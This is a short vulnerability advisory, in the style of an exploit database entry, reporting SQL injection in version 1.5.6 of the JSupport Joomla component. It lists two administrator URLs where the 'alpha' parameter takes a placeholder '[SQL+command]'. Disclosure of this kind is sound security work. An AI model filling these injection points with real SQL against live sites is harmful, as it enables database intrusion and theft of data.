# Exploit Title: Joomla Component com_jsupport SQL Injection Vulnerability
# Date: 2020.10.11
# Author: OmideMehraban
# Category: webapps/0day
# Version: 1.5.6
# Tested on: Linux/win 10
[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
>> General Information
Advisory/Exploit Title = Joomla Component com_jsupport SQL Injection Vulnerability
Author = OmideMehraban
Contact = Instagram: @omidemehraban Telegram: @omiid
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = JSupport
Vendor = Extension Depot
Vendor Website = http://www.extensiondepot.com/extensions/jsupport.html
Affected Version(s) = 1.5.6
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
>> SQL Injection
This vulnerability can be found by viewing the component in the Joomla administrator
backend.
Examples:
administrator/index.php?option=com_jsupport&task=listTickets&alpha=[SQL+command]
administrator/index.php?option=com_jsupport&task=listFaqs&alpha=[SQL+command]
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
>> Additional Information
Advisory/Exploit Published = 2020.10.11
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
>> Misc
Greetz = Ex3ptionaL
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]